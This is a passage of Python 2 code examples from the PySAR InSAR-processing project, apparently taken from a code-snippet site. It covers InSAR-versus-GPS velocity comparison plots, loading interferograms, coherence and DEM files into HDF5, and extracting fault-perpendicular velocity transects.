           if np.abs(gpsLOS+insarData[IDY][IDX]*1000.0) < GPS_InSAR_dif_thr:
               GPSx1.append(IDX)
               GPSy1.append(IDY)
           else:
               GPSx2.append(IDX)
               GPSy2.append(IDY)
      except:
        NoInSAR='yes'
  
  # print '######################################################################'
  # print 'GPS:'
  # print GPS
  # print 'InSAR:'
  # print InSAR
  # print 'Coherence:'
  # print coherence
  # print 'Stations'
  # print GPS_station    
  # print '######################################################################'
  # ind0=InSAR.index(0)
    
   InSAR=np.array(InSAR)
   GPS=np.array(GPS)
   GPS_std=np.array(GPS_std)
   lt=len(InSAR)
 #  RMSE=np.sqrt((np.sum((InSAR-GPS)**2,0))/lt)
#   SAD=np.sum(np.abs(InSAR-GPS),0)/np.sum(np.abs(InSAR))
   SAD=np.sum(np.abs(InSAR-GPS),0)/lt
   C1=np.zeros([2,len(InSAR)])
   C1[0][:]=InSAR
   C1[1][:]=GPS
   Cor = np.corrcoef(C1)[0][1]
   print '++++++++++++++++++++++++++++++++++++++++++++++'
   print 'Comparison summary:'
   print ''
   print 'AAD (average absolute difference)= '+str(SAD) + ' [mm/yr]'
   print 'Correlation = '+str(Cor)
   print ''
   print '++++++++++++++++++++++++++++++++++++++++++++++'
###############################################################
   try:
      minV
      maxV
   except:
      minV=np.min([InSAR,GPS])
      maxV=np.max([InSAR,GPS])


   fig = plt.figure()
   ax=fig.add_subplot(111)
#   ax.errorbar(GPS,InSAR,yerr=1.0, xerr=1.0, fmt='o')
   ax.errorbar(GPS,InSAR,yerr=0.0, xerr=uncertainty_fac*GPS_std, fmt='ko',ms=MarkerSize)
   ax.plot([minV-3,maxV+3],[minV-3,maxV+3],'k--')
   ax.set_ylabel('InSAR [mm/yr]',fontsize=26)
   ax.set_xlabel('GPS LOS [mm/yr]',fontsize=26)
   ax.set_ylim(minV-3,maxV+3)
   ax.set_xlim(minV-3,maxV+3)
   ##
   if annotation in ['yes','y','Y','Yes','YES']:
      for i in range(len(GPS)) :
          ax.annotate(GPS_station[i],xy=(GPS[i], InSAR[i]), xytext=(GPS[i]+ann_x, InSAR[i]+ann_y),color=annotation_Color)

   majorLocator = MultipleLocator(5)
   ax.yaxis.set_major_locator(majorLocator)
   minorLocator   = MultipleLocator(1)
   ax.yaxis.set_minor_locator(minorLocator)
   ax.xaxis.set_minor_locator(minorLocator)
   for tick in ax.xaxis.get_major_ticks():
                tick.label.set_fontsize(26)
   for tick in ax.yaxis.get_major_ticks():
                tick.label.set_fontsize(26)
   plt.tick_params(which='major', length=15,width=2)
   plt.tick_params(which='minor', length=6,width=2)

   figName = 'InSARvsGPS_errorbar.png'
   # plt.savefig(figName,pad_inches=0.0)  
   plt.savefig(figName) 
###############################################################
   
   fig = plt.figure()
   ax=fig.add_subplot(111)
   ax.plot(GPS,InSAR, 'ko',ms=MarkerSize)
   ax.plot([minV-3,maxV+3],[minV-3,maxV+3],'k--')
  # ax.plot([-10,20],[-10,20],'k--')
   ax.set_ylabel('InSAR [mm/yr]',fontsize=26)
   ax.set_xlabel('GPS LOS [mm/yr]',fontsize=26)
   ax.set_ylim(minV-3,maxV+3)
   ax.set_xlim(minV-3,maxV+3)
  # ax.set_ylim(-10,15)
  # ax.set_xlim(-10,15)
   if annotation in ['yes','y','Y','Yes','YES']:
      for i in range(len(GPS)) :
          ax.annotate(GPS_station[i],xy=(GPS[i], InSAR[i]), xytext=(GPS[i]+ann_x, InSAR[i]+ann_y),color=annotation_Color)

   majorLocator = MultipleLocator(5)
   ax.yaxis.set_major_locator(majorLocator)
   minorLocator   = MultipleLocator(1)
   ax.yaxis.set_minor_locator(minorLocator)
   ax.xaxis.set_minor_locator(minorLocator)
   for tick in ax.xaxis.get_major_ticks():
                tick.label.set_fontsize(26)
   for tick in ax.yaxis.get_major_ticks():
                tick.label.set_fontsize(26)
   plt.tick_params(which='major', length=15,width=2)
   plt.tick_params(which='minor', length=6,width=2)

   figName = 'InSARvsGPS.png'
   # plt.savefig(figName,pad_inches=0.0)  
   plt.savefig(figName)
  
   ######################################################

   try:
     Coh
     fig = plt.figure()
     ax=fig.add_subplot(111)
     ax.errorbar(GPS1,InSAR1,yerr=1.0, xerr=1.0, fmt='o')
     ax.errorbar(GPS2,InSAR2,yerr=1.0, xerr=1.0, fmt='^')
     ax.plot([minV-3,maxV+3],[minV-3,maxV+3],'--')
     ax.set_ylabel('InSAR [mm/yr]',fontsize=26)
     ax.set_xlabel('GPS LOS [mm/yr]',fontsize=26)
     ax.set_ylim(minV-3,maxV+3)
     ax.set_xlim(minV-3,maxV+3)

   except:
     print ''

#   if disp_velocity=='yes':
 #    fig = plt.figure()
  #   ax=fig.add_subplot(111)
    # im=ax.imshow(insarData)
    # cbar = plt.colorbar(im)
    # ax.plot(GPSx,GPSy,'k^',ms=10)
   #  ax.plot(IDXref,IDYref,'ks',ms=10)
    # ax.plot(GPSx1,GPSy1,'gs',ms=10)
    # ax.plot(GPSx2,GPSy2,'rs',ms=10)

   plt.show()

Example 46

Project: PySAR
Source File: load_data.py
View license
def main(argv):
  try:
    templateFile = argv[1]
  except:
    print '''
    *******************************************

       loading the processed data for PySAR:
	   interferograms (unwrapped and wrapped)
	   coherence files
           geomap.trans file
           DEM (radar and geo coordinate)
       
       Usage: load_data.py TEMPLATEFILE  

    *******************************************         
    '''
    sys.exit(1)

  templateContents = readfile.read_template(templateFile)
  projectName = os.path.basename(templateFile).partition('.')[0]

############# Assign workubf directory ##############################
  try:     tssarProjectDir = os.getenv('TSSARDIR') +'/'+projectName                     # use TSSARDIR if environment variable exist
  except:  tssarProjectDir = os.getenv('SCRATCHDIR') + '/' + projectName + "/TSSAR"     # FA 7/2015: adopted for new directory structure
 
  print "QQ " + tssarProjectDir
  if not os.path.isdir(tssarProjectDir): os.mkdir(tssarProjectDir)

########### Use defaults if paths not given in template file #########
  try:    igramPath = templateContents['pysar.inputFiles'];  igramPath = check_variable_name(igramPath)
  except: igramPath = os.getenv('SCRATCHDIR') + '/' + projectName + '/PROCESS/DONE/IFGRAM*/filt_*.unw'

  try:    corPath   = templateContents['pysar.corFiles'];      corPath = check_variable_name(corPath)
  except: corPath   = os.getenv('SCRATCHDIR') + '/' + projectName + '/PROCESS/DONE/IFGRAM*/filt_*.cor'

  try:    wrapPath  = templateContents['pysar.wrappedFiles']; wrapPath = check_variable_name(wrapPath)
  except: wrapPath  = os.getenv('SCRATCHDIR') + '/' + projectName + '/PROCESS/DONE/IFGRAM*/filt_*.int'

  #try:    demRdrPath = templateContents['pysar.dem.radarCoord'];  demRdrPath = check_variable_name(demRdrPath)
  #except: 
  #  demRdrList=glob.glob(demRdrPath)
  


###########################################################################
######################### Unwrapped Interferograms ########################

  try:
    if os.path.isfile(tssarProjectDir+'/LoadedData.h5'):
      print '\nLoadedData.h5'+ '  already exists.'
      sys.exit(1)
    igramList = glob.glob(igramPath)    
    k = 'interferograms'
    check_number(k,igramList)	# number check 
    print 'loading interferograms ...'
    igramList,mode_width,mode_length = check_size(k,igramList)	# size check

    h5file = tssarProjectDir+'/LoadedData.h5'
    f = h5py.File(h5file)
    gg = f.create_group('interferograms')
    MaskZero=np.ones([int(mode_length),int(mode_width)])
    for igram in igramList:
      if not os.path.basename(igram) in f:
        print 'Adding ' + igram
        group = gg.create_group(os.path.basename(igram))
        amp,unw,unwrsc = readfile.read_float32(igram)
        MaskZero=amp*MaskZero
 
        dset = group.create_dataset(os.path.basename(igram), data=unw, compression='gzip')
        for key,value in unwrsc.iteritems():
          group.attrs[key] = value

        d1,d2=unwrsc['DATE12'].split('-')
        baseline_file=os.path.dirname(igram)+'/'+d1+'_'+d2+'_baseline.rsc'
        baseline=readfile.read_rsc_file(baseline_file)
        for key,value in baseline.iteritems():
          group.attrs[key] = value
      else:
        print os.path.basename(h5file) + " already contains " + os.path.basename(igram)

    Mask=np.ones([int(mode_length),int(mode_width)])
    Mask[MaskZero==0]=0
    gm = f.create_group('mask')
    dset = gm.create_dataset('mask', data=Mask, compression='gzip')
    f.close()

    ############## Mask file ###############
    print 'writing to Mask.h5\n'
    Mask=np.ones([int(mode_length),int(mode_width)])
    Mask[MaskZero==0]=0
    h5file = tssarProjectDir+'/Mask.h5'
    h5mask = h5py.File(h5file,'w')
    group=h5mask.create_group('mask')
    dset = group.create_dataset(os.path.basename('mask'), data=Mask, compression='gzip')
    for key,value in unwrsc.iteritems():
       group.attrs[key] = value
    h5mask.close()

  except:
    print 'No unwrapped interferogram is loaded.\n'


########################################################################
############################# Coherence ################################
  try:
    if os.path.isfile(tssarProjectDir+'/Coherence.h5'):
      print '\nCoherence.h5'+ '  already exists.'
      sys.exit(1)
    corList = glob.glob(corPath)
    k = 'coherence'
    check_number(k,corList)   # number check 
    print 'loading coherence files ...'
    corList,mode_width,mode_length = check_size(k,corList)     # size check

    h5file = tssarProjectDir+'/Coherence.h5'
    fcor = h5py.File(h5file)
    gg = fcor.create_group('coherence')
    meanCoherence=np.zeros([int(mode_length),int(mode_width)])
    for cor in corList:
      if not os.path.basename(cor) in fcor:
        print 'Adding ' + cor
        group = gg.create_group(os.path.basename(cor))
        amp,unw,unwrsc = readfile.read_float32(cor)

        meanCoherence=meanCoherence+unw
        dset = group.create_dataset(os.path.basename(cor), data=unw, compression='gzip')
        for key,value in unwrsc.iteritems():
           group.attrs[key] = value

        d1,d2=unwrsc['DATE12'].split('-')
        baseline_file=os.path.dirname(cor)+'/'+d1+'_'+d2+'_baseline.rsc'
        baseline=readfile.read_rsc_file(baseline_file)
        for key,value in baseline.iteritems():
           group.attrs[key] = value
      else:
        print os.path.basename(h5file) + " already contains " + os.path.basename(cor)
    #fcor.close()

    ########### mean coherence file ###############
    meanCoherence=meanCoherence/(len(corList))
    print 'writing meanCoherence group to the coherence h5 file'
    gc = fcor.create_group('meanCoherence')
    dset = gc.create_dataset('meanCoherence', data=meanCoherence, compression='gzip')

    print 'writing average_spatial_coherence.h5\n'
    h5file_CorMean = tssarProjectDir+'/average_spatial_coherence.h5'
    fcor_mean = h5py.File(h5file_CorMean,'w')
    group=fcor_mean.create_group('mask')
    dset = group.create_dataset(os.path.basename('mask'), data=meanCoherence, compression='gzip')
    for key,value in unwrsc.iteritems():
       group.attrs[key] = value
    fcor_mean.close()

    fcor.close()

  except:
    print 'No correlation file is loaded.\n'


##############################################################################
########################## Wrapped Interferograms ############################

  try:
    if os.path.isfile(tssarProjectDir+'/Wrapped.h5'):
      print '\nWrapped.h5'+ '  already exists.'
      sys.exit(1)
    wrapList = glob.glob(wrapPath)
    k = 'wrapped'
    check_number(k,wrapList)   # number check 
    print 'loading wrapped phase ...'
    wrapList,mode_width,mode_length = check_size(k,wrapList)     # size check

    h5file = tssarProjectDir+'/Wrapped.h5'
    fw = h5py.File(h5file)
    gg = fw.create_group('wrapped')
    for wrap in wrapList:
      if not os.path.basename(wrap) in fw:
        print 'Adding ' + wrap
        group = gg.create_group(os.path.basename(wrap))
        amp,unw,unwrsc = readfile.read_complex64(wrap)

        dset = group.create_dataset(os.path.basename(wrap), data=unw, compression='gzip')
        for key,value in unwrsc.iteritems():
           group.attrs[key] = value

        d1,d2=unwrsc['DATE12'].split('-')
        baseline_file=os.path.dirname(wrap)+'/'+d1+'_'+d2+'_baseline.rsc'
        baseline=readfile.read_rsc_file(baseline_file)
        for key,value in baseline.iteritems():
           group.attrs[key] = value
      else:
        print os.path.basename(h5file) + " already contains " + os.path.basename(wrap)
    fw.close()
    print 'Writed '+str(len(wrapList))+' wrapped interferograms to '+h5file+'\n'
  except:
    print 'No wrapped interferogram is loaded.\n'


##############################################################################
################################# geomap.trans ###############################

  try:
    geomapPath = tssarProjectDir+'/geomap*.trans'
    geomapList = glob.glob(geomapPath)
    if len(geomapList)>0:
      print '\ngeomap*.trans'+ '  already exists.'
      sys.exit(1)

    geomapPath=templateContents['pysar.geomap']
    geomapPath=check_variable_name(geomapPath)
    geomapList=glob.glob(geomapPath)

    cpCmd="cp " + geomapList[0] + " " + tssarProjectDir
    print cpCmd
    os.system(cpCmd)
    cpCmd="cp " + geomapList[0] + ".rsc " + tssarProjectDir
    print cpCmd+'\n'
    os.system(cpCmd)
  except:
    #print "*********************************"
    print "no geomap file is loaded.\n"
    #print "*********************************\n"


##############################################################################
##################################  DEM  #####################################

  try:
    demRdrPath = tssarProjectDir+'/radar*.hgt'
    demRdrList = glob.glob(demRdrPath)
    if len(demRdrList)>0:
      print '\nradar*.hgt'+ '  already exists.'
      sys.exit(1)

    demRdrPath=templateContents['pysar.dem.radarCoord']
    demRdrPath=check_variable_name(demRdrPath)
    demRdrList=glob.glob(demRdrPath)

    cpCmd="cp " + demRdrList[0] + " " + tssarProjectDir
    print cpCmd
    os.system(cpCmd)
    cpCmd="cp " + demRdrList[0] + ".rsc " + tssarProjectDir
    print cpCmd+'\n'
    os.system(cpCmd)
  except:
    #print "*********************************"
    print "no DEM (radar coordinate) file is loaded.\n"
    #print "*********************************"

  try:
    demGeoPath = tssarProjectDir+'/*.dem'
    demGeoList = glob.glob(demGeoPath)
    if len(demGeoList)>0:
      print '\n*.dem'+ '  already exists.'
      sys.exit(1)

    demGeoPath=templateContents['pysar.dem.geoCoord']
    demGeoPath=check_variable_name(demGeoPath)
    demGeoList=glob.glob(demGeoPath)

    cpCmd="cp " + demGeoList[0] + " " + tssarProjectDir
    print cpCmd
    os.system(cpCmd)
    cpCmd="cp " + demGeoList[0] + ".rsc " + tssarProjectDir
    print cpCmd+'\n'
    os.system(cpCmd)
  except:
    #print "*********************************"
    print "no DEM (geo coordinate) file is loaded.\n"

Example 47

Project: PySAR
Source File: multi_transect.py
View license
def main(argv):
  ntrans=1
  save_to_mat='off'
  flip_profile='no'
  which_gps = 'all'
  flip_updown = 'yes'
  incidence_file='incidence_file'
  display_InSAR='on'
  display_Average='on'
  display_Standard_deviation='on'

  try:
       opts, args = getopt.getopt(argv,"f:s:e:n:d:g:l:h:r:L:F:p:u:G:S:i:I:A:U:E:D:W:x:X:")

  except getopt.GetoptError:
       Usage() ; sys.exit(1)

  for opt,arg in opts:
      if opt == '-f':
        velocityFile = arg
      elif opt == '-s':
        pnt1 = arg.split(',')
        y0=int(pnt1[0])
        x0=int(pnt1[1])
      elif opt == '-e':
        pnt2 = arg.split(',')
        y1=int(pnt2[0])
        x1=int(pnt2[1])
      elif opt == '-n':
        ntrans = int(arg)
      elif opt == '-d':
        dp = float(arg)
      elif opt == '-g':
        gpsFile=arg
      elif opt == '-r':
        refStation=arg
      elif opt == '-i':
        incidence_file=arg
      elif opt == '-L':
        stationsList = arg.split(',')
      elif opt == '-F':
        Fault_coord_file=arg
      elif opt == '-p':
        flip_profile=arg
      elif opt == '-u':
        flip_updown=arg
        print flip_updown
      elif opt == '-G':
        which_gps=arg
      elif opt == '-S':
        gps_source=arg
      elif opt == '-l':
        lbound=float(arg)
      elif opt == '-I':
        display_InSAR=arg
      elif opt == '-A':
        display_Average=arg
      elif opt == '-U':
        display_Standard_deviation=arg
      elif opt == '-E':
        save_to_mat=arg
      elif opt == '-h':
        hbound=float(arg)
      elif opt == '-D':
        Dp=float(arg)
      elif opt == '-W':
        profile_Length=float(arg)
      elif opt == '-x':
        x_lbound=float(arg) 
      elif opt == '-X':
        x_hbound=float(arg)

  try:    
       h5file=h5py.File(velocityFile,'r')
  except:
       Usage()
       sys.exit(1)
    
  k=h5file.keys()
  dset= h5file[k[0]].get(k[0])
  z=dset[0:dset.shape[0],0:dset.shape[1]]
  dx=float(h5file[k[0]].attrs['X_STEP'])*6375000.0*np.pi/180.0
  dy=float(h5file[k[0]].attrs['Y_STEP'])*6375000.0*np.pi/180.0

#############################################################################

  try:
      lat,lon,lat_step,lon_step,lat_all,lon_all = get_lat_lon(h5file)
  except:
      print 'radar coordinate'

  Fault_lon,Fault_lat=read_fault_coords(Fault_coord_file,Dp)


 # Fault_lon=[66.40968453947265,66.36000186563085,66.31103920134248]
 # Fault_lat=[30.59405079532564,30.51565960186412,30.43928430936202]

  Num_profiles=len(Fault_lon)-1
  print '*********************************************'
  print '*********************************************'
  print 'Number of profiles to be generated: '+str(Num_profiles)
  print '*********************************************'
  print '*********************************************'

  for Np in range(Num_profiles):
    FaultCoords=[Fault_lat[Np],Fault_lon[Np],Fault_lat[Np+1],Fault_lon[Np+1]] 
    print '%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%'
    print '%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%'
    print ''
    print 'Profile '+str(Np) + ' [of total '+str(Num_profiles)+']'
    print ''
    
    try:
    #  Lat0 = dms2d(FaultCoords[0]); Lon0 = dms2d(FaultCoords[1])
    #  Lat1 = dms2d(FaultCoords[2]); Lon1 = dms2d(FaultCoords[3])

      Lat0 = FaultCoords[0]; Lon0 = FaultCoords[1]
      Lat1 = FaultCoords[2]; Lon1 = FaultCoords[3]
      Length,Width=np.shape(z)
      Yf0,Xf0=find_row_column(Lon0,Lat0,lon,lat,lon_step,lat_step)
      Yf1,Xf1=find_row_column(Lon1,Lat1,lon,lat,lon_step,lat_step)

      print '*********************************************'
      print ' Fault Coordinates:'
      print '   --------------------------  '
      print '    Lat          Lon'
      print str(Lat0) + ' , ' +str(Lon0)
      print str(Lat1) + ' , ' +str(Lon1)
      print '   --------------------------  '
      print '    row          column'
      print str(Yf0) + ' , ' +str(Xf0)
      print str(Yf1) + ' , ' +str(Xf1)
      print '*********************************************'
#      mf=float(Yf1-Yf0)/float((Xf1-Xf0))  # slope of the fault line
#      cf=float(Yf0-mf*Xf0)   # intercept of the fault line
#      df0=dist_point_from_line(mf,cf,x0,y0,1,1)   #distance of the profile start point from the Fault line
#      df1=dist_point_from_line(mf,cf,x1,y1,1,1)  #distance of the profile end point from the Fault line

#      mp=-1./mf  # slope of profile which is perpendicualr to the fault line 
#      x1=int((df0+df1)/np.sqrt(1+mp**2)+x0)    # correcting the end point of the profile to be on a line perpendicular to the Fault
#      y1=int(mp*(x1-x0)+y0)


    except:
      print '*********************************************'
      print 'No information about the Fault coordinates!'
      print '*********************************************'

#############################################################################
    y0,x0,y1,x1 = get_start_end_point(Xf0,Yf0,Xf1,Yf1,profile_Length,dx,dy)

    try:
      x0;y0;x1;y1
    except:
      fig = plt.figure()
      ax=fig.add_subplot(111)
      ax.imshow(z)
      try:
        ax.plot([Xf0,Xf1],[Yf0,Yf1],'k-')
      except:
        print 'Fault line is not specified'

      xc=[]
      yc=[]
      print 'please click on start and end point of the desired profile'
      def onclick(event):
        if event.button==1:
          print 'click'
          xc.append(int(event.xdata))
          yc.append(int(event.ydata))
      cid = fig.canvas.mpl_connect('button_press_event', onclick)
      plt.show()
      x0=xc[0];x1=xc[1]
      y0=yc[0];y1=yc[1]
##############################################################################
   # try:
   #   mf=float(Yf1-Yf0)/float((Xf1-Xf0))  # slope of the fault line
   #   cf=float(Yf0-mf*Xf0)   # intercept of the fault line
   #   df0=dist_point_from_line(mf,cf,x0,y0,1,1)   #distance of the profile start point from the Fault line
   #   df1=dist_point_from_line(mf,cf,x1,y1,1,1)  #distance of the profile end point from the Fault line

   #   mp=-1./mf  # slope of profile which is perpendicualr to the fault line 
   #   x1=int((df0+df1)/np.sqrt(1+mp**2)+x0)    # correcting the end point of the profile to be on a line perpendicular to the Fault
   #   y1=int(mp*(x1-x0)+y0)
   # except:
   #   Info_aboutFault='No'

##############################################################################
    print '******************************************************'
    print 'First profile coordinates:'
    print 'Start point:  y = '+str(y0) +',x = '+ str(x0) 
    print 'End point:   y = '+ str(y1) + '  , x = '+str(x1)   
    print '' 
    print str(y0) +','+ str(x0)
    print str(y1) +','+ str(x1)
    print '******************************************************'
    length = int(np.hypot(x1-x0, y1-y0))
    x, y = np.linspace(x0, x1, length), np.linspace(y0, y1, length)
    zi = z[y.astype(np.int), x.astype(np.int)]
    try:
      lat_transect=lat_all[y.astype(np.int), x.astype(np.int)]
      lon_transect=lon_all[y.astype(np.int), x.astype(np.int)] 
    except:
      lat_transect='Nan'
      lon_transect='Nan'
  #  print '$$$$$$$$$$$$$$$'
  #  print lat_transect
  #  print lat_all.shape
  #  print '$$$$$$$$$$$$$$$'

   # zi=get_transect(z,x0,y0,x1,y1)
 
    try:
       dx=float(h5file[k[0]].attrs['X_STEP'])*6375000.0*np.pi/180.0
       dy=float(h5file[k[0]].attrs['Y_STEP'])*6375000.0*np.pi/180.0
       DX=(x-x0)*dx
       DY=(y-y0)*dy
       D=np.hypot(DX, DY)
       print 'geo coordinate:'
       print 'profile length = ' +str(D[-1]/1000.0) + ' km'
     #  df0_km=dist_point_from_line(mf,cf,x0,y0,dx,dy)
    except:
       dx=float(h5file[k[0]].attrs['RANGE_PIXEL_SIZE'])
       dy=float(h5file[k[0]].attrs['AZIMUTH_PIXEL_SIZE'])
       DX=(x-x0)*dx
       DY=(y-y0)*dy
       D=np.hypot(DX, DY)
       print 'radar coordinate:'
       print 'profile length = ' +str(D[-1]/1000.0) + ' km'       
    #   df0_km=dist_point_from_line(mf,cf,x0,y0,dx,dy)

    try:
       mf,cf=line(Xf0,Yf0,Xf1,Yf1)
       df0_km=dist_point_from_line(mf,cf,x0,y0,dx,dy)
    except:
       print 'Fault line is not specified'


    transect=np.zeros([len(D),ntrans])    
    transect[:,0]=zi
    XX0=[];XX1=[]
    YY0=[];YY1=[]
    XX0.append(x0);XX1.append(x1)
    YY0.append(y0);YY1.append(y1)

    if ntrans >1:
      
       m=float(y1-y0)/float((x1-x0))
       c=float(y0-m*x0)       
       m1=-1.0/m
       try:
         dp
       except:
         dp=1.0
       if lat_transect=='Nan':
         for i in range(1,ntrans):
         
           X0=i*dp/np.sqrt(1+m1**2)+x0  
           Y0=m1*(X0-x0)+y0
           X1=i*dp/np.sqrt(1+m1**2)+x1
           Y1=m1*(X1-x1)+y1
           zi=get_transect(z,X0,Y0,X1,Y1)         
           transect[:,i]=zi
           XX0.append(X0);XX1.append(X1);
           YY0.append(Y0);YY1.append(Y1);
       else:
         transect_lat=np.zeros([len(D),ntrans])
         transect_lat[:,0]=lat_transect
         transect_lon=np.zeros([len(D),ntrans])
         transect_lon[:,0]=lon_transect
 
         for i in range(1,ntrans):
         
           X0=i*dp/np.sqrt(1+m1**2)+x0
           Y0=m1*(X0-x0)+y0
           X1=i*dp/np.sqrt(1+m1**2)+x1
           Y1=m1*(X1-x1)+y1
           zi=get_transect(z,X0,Y0,X1,Y1)
           lat_transect=get_transect(lat_all,X0,Y0,X1,Y1)
           lon_transect=get_transect(lon_all,X0,Y0,X1,Y1)       
           transect[:,i]=zi
           transect_lat[:,i]=lat_transect
           transect_lon[:,i]=lon_transect
           XX0.append(X0);XX1.append(X1);
           YY0.append(Y0);YY1.append(Y1);
       
   # print np.shape(XX0)
   # print np.shape(XX1)
   # print np.shape(YY0) 
   # print np.shape(YY1)


#############################################
    try:
        m_prof_edge,c_prof_edge=line(XX0[0],YY0[0],XX0[-1],YY0[-1])    
    except:
        print 'Plotting one profile'    
###############################################################################    
    if flip_profile=='yes':
       transect=np.flipud(transect)
       try:
         df0_km=np.max(D)-df0_km
       except:
         print ''
    

    print '******************************************************'
    try:
       gpsFile
    except:
       gpsFile='Nogps'
    print 'GPS velocity file:'
    print gpsFile
    print '*******************************************************'
    if os.path.isfile(gpsFile):
       insarData=z
       del z
       fileName, fileExtension = os.path.splitext(gpsFile)
    #   print fileExtension
     #  if fileExtension =='.cmm4':
     #      print 'reading cmm4 velocities'
     #      Stations, gpsData = redGPSfile_cmm4(gpsFile)
     #      idxRef=Stations.index(refStation)
     #      Lon,Lat,Ve,Vn,Se,Sn,Corr,Hrate,H12=gpsData[idxRef,:]
     #      Lon=Lon-360.0
          # Lat,Lon,Ve,Se,Vn,Sn,Corr,NumEpochs,timeSpan,AvgEpochTimes = gpsData[idxRef,:]
     #      Vu=0
     #  else:
     #      Stations, gpsData = redGPSfile(gpsFile)
     #      idxRef=Stations.index(refStation)
     #      Lat,Lon,Vn,Ve,Sn,Se,Corr,Vu,Su = gpsData[idxRef,:]
      
       Stations,Lat,Lon,Ve,Se,Vn,Sn=readGPSfile(gpsFile,gps_source)
       idxRef=Stations.index(refStation)
       Length,Width=np.shape(insarData)
       lat,lon,lat_step,lon_step = get_lat_lon(h5file,Length,Width)
       IDYref,IDXref=find_row_column(Lon[idxRef],Lat[idxRef],lon,lat,lon_step,lat_step)
       if (not np.isnan(IDYref)) and (not np.isnan(IDXref)):
         print 'referencing InSAR data to the GPS station at : ' + str(IDYref) + ' , '+ str(IDXref)
         if not np.isnan(insarData[IDYref][IDXref]):
             transect = transect - insarData[IDYref][IDXref]
             insarData=insarData - insarData[IDYref][IDXref]
            
         else:
            
             print ''' 
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
      
      WARNING: nan value for InSAR data at the refernce pixel!
               reference station should be a pixel with valid value in InSAR data.
                               
               please select another GPS station as the reference station.

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                       
                   '''
             sys.exit(1)
       else:
         print 'WARNING:'
         print 'Reference GPS station is out of the area covered by InSAR data'
         print 'please select another GPS station as the reference station.'
         sys.exit(1)
       
       try:
         stationsList
       except:
         stationsList = Stations

        
      # theta=23.0*np.pi/180.0
       if os.path.isfile(incidence_file):
           print 'Using exact look angle for each pixel'
           h5file_theta=h5py.File(incidence_file,'r')
           dset=h5file_theta['mask'].get('mask')
           theta=dset[0:dset.shape[0],0:dset.shape[1]]
           theta=theta*np.pi/180.0
       else:
           print 'Using average look angle'
           theta=np.ones(np.shape(insarData))*23.0*np.pi/180.0

       heading=193.0*np.pi/180.0
       
     #  unitVec=[-np.sin(theta)*np.sin(heading),-np.cos(heading)*np.sin(theta),-np.cos(theta)]
       unitVec=[np.cos(heading)*np.sin(theta),-np.sin(theta)*np.sin(heading),0]#-np.cos(theta)]
       
      #  [0.0806152480932643, 0.34918300221540616, -0.93358042649720174]
       # print unitVec 
       # unitVec=[0.3,-0.09,0.9]
      # unitVec=[-0.3,0.09,-0.9]
      # unitVec=[-0.3,0.09,0]

      # print '*******************************************'
      # print 'unit vector to project GPS to InSAR LOS:'
      # print unitVec
      # print '*******************************************'
      # gpsLOS_ref=unitVec[0]*Ve[idxRef]+unitVec[1]*Vn[idxRef]#+unitVec[2]*Vu[idxRef]       

#       print np.shape(theta)
#       print IDYref
#       print IDXref
#       print theta[IDYref,IDXref]

       gpsLOS_ref = gps_to_LOS(Ve[idxRef],Vn[idxRef],theta[IDYref,IDXref],heading)
       print '%%%%%%^^^^^^^%%%%%%%%'
       print gpsLOS_ref/1000.0
      # insarData=insarData -gpsLOS_ref/1000.0 
      # transect = transect -gpsLOS_ref/1000.0

       GPS=[]
       GPS_station=[]
       GPSx=[]
       GPSy=[]
       GPS_lat=[]
       GPS_lon=[]
       for st in stationsList:
         try :
           idx=Stations.index(st)
          
          # gpsLOS = unitVec[0]*Ve[idx]+unitVec[1]*Vn[idx]#+unitVec[2]*Vu[idx]
            
         #  gpsLOS = gps_to_LOS(Ve[idx],Vn[idx],theta[idx],heading)
         #  gpsLOS=gpsLOS-gpsLOS_ref

           IDY,IDX=find_row_column(Lon[idx],Lat[idx],lon,lat,lon_step,lat_step)
           print theta[IDY,IDX]
           gpsLOS = gps_to_LOS(Ve[idx],Vn[idx],theta[IDY,IDX],heading)
         #  gpsLOS = gpsLOS-gpsLOS_ref

           if which_gps =='all':
             if theta[IDY,IDX]!=0.0:
               GPS.append(gpsLOS-gpsLOS_ref)
               GPS_station.append(st)
               GPSx.append(IDX)
               GPSy.append(IDY)
               GPS_lat.append(Lat[idx])
               GPS_lon.append(Lon[idx])   
           elif not np.isnan(insarData[IDY][IDX]):
             if theta[IDY,IDX]!=0.0:
               GPS.append(gpsLOS-gpsLOS_ref)
               GPS_station.append(st)
               GPSx.append(IDX)
               GPSy.append(IDY)
               GPS_lat.append(Lat[idx])
               GPS_lon.append(Lon[idx])
         except:
           NoInSAR='yes'   
       
      # print GPS_station
      # print gpsLOS 
       DistGPS=[]
       GPS_in_bound=[]
       GPS_in_bound_st=[] 
       GPSxx=[]
       GPSyy=[]
       for i in range(len(GPS_station)):
         gx=GPSx[i]
         gy=GPSy[i]
 #        print '******************'
      #   print gx
      #   print gy
         if which_gps in ['all','insar']:
             check_result = 'True'
         else:
             check_result=check_st_in_box(gx,gy,x0,y0,x1,y1,X0,Y0,X1,Y1)

         if check_result=='True':
           check_result2=check_st_in_box2(gx,gy,x0,y0,x1,y1,X0,Y0,X1,Y1)
           GPS_in_bound_st.append(GPS_station[i])
           GPS_in_bound.append(GPS[i])
           GPSxx.append(GPSx[i])
           GPSyy.append(GPSy[i])   
          # gy=y0+1
          # gx=x0+1
          # gxp,gyp=get_intersect(m,c,gx,gy)
          # Dx=dx*(gx-gxp);Dy=dy*(gy-gyp)
          # print gxp
          # print gyp
           dg = dist_point_from_line(m,c,gx,gy,1,1) # distance of GPS station from the first profile line
          # DistGPS.append(np.hypot(Dx,Dy))
          # X0=dg/np.sqrt(1+m1**2)+x0
          # Y0=m1*(X0-x0)+y0
          # DistGPS.append(np.hypot(dx*(gx-X0), dy*(gy-Y0)))
          
           DistGPS.append(dist_point_from_line(m_prof_edge,c_prof_edge,GPSx[i],GPSy[i],dx,dy))
           

       print '****************************************************'
       print 'GPS stations in the profile area:' 
       print GPS_in_bound_st
       print '****************************************************'
       GPS_in_bound = np.array(GPS_in_bound)
       DistGPS = np.array(DistGPS)
   #    axes[1].plot(DistGPS/1000.0, -1*GPS_in_bound/1000, 'bo')

    if gpsFile=='Nogps':
